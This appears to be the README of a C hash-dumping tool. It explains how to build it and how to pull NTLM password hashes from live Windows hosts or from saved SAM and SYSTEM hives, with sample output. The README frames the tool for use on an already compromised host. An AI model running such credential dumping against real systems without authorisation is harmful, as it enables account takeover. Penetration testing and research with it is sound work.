Windows NTLM hash dump utility written in C language, that supports Windows and Linux.
Hash dumper has got 2 modes:
- Realtime mode (only for windows);
- Extraction mode (dumps from saved SAM and SYSTEM hives files);
The author is not responsible for the actions of third parties committed while using the provided software. This software is regarded as a tool for legal penetration testing or conducting research. In case of misuse, the author does not bear any responsibility for the actions of third parties.
For building required OpenSSL >= 3.0 or OpenSSL 1.1.1 library. Use cmake to generate a solution for Visual Studio or Make file. If CMake cannot find OpenSSL, than set OPENSSL_ROOT_DIR and OPENSSL_LIB_DIR variables.
If OpenSSL >= 3.0 was chosen, than legacy provider have to be compiled for RC4 and DES
Basic setup
Cloning repository
$ git clone https://github.com/Retr0-code/hash-dumper
$ git submodule update --initIf You work alone
$ git branch dev_<username>
$ git checkout dev_<username>
$ git push -u origin dev_<username>OR
If You work in a small team
$ git checkout dev_<team_tag>
$ git pullBuilding using cmake
Use BUILD_ARCH parameter to specify architecture of output binary
Architectures:
- amd64 (default);
- i386;
Use BUILD_TARGET parameter to specify compiling configuration
Configurations:
- RELEASE (default);
- DEBUG;
You can use this utility to dump NTLMv1/2 hashes from already compromised host by using --realtime flag
> ./hash_dumper.exe --realtime
[+] Hives successfully opened
[+] Successfully dumped bootkey: 2766FA60DBAB4DEE67237AC942E35271
[+] Successfully hashed the bootkey: 966408e98667069a4884956c5e397575
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9cf3445f9555a4c246fe2c3c2446b103:::
sandbox:1002:aad3b435b51404eeaad3b435b51404ee:67b6acadb87c12e9d84e6e73b6883601:::
[+] Successfully finished
Otherwise You can extract hashes from already saved hives using parameters --sam <path_to_sam_hive> and --system <path_to_system_hive>
> ./hash_dumper.exe --sam hives/sam --system hives/system
[+] Hives successfully opened
[+] Successfully dumped bootkey: 2766FA60DBAB4DEE67237AC942E35271
[+] Successfully hashed the bootkey: 966408e98667069a4884956c5e397575
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9cf3445f9555a4c246fe2c3c2446b103:::
sandbox:1002:aad3b435b51404eeaad3b435b51404ee:67b6acadb87c12e9d84e6e73b6883601:::
[+] Successfully finished
If You supply all parameters only --realtime will work.
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent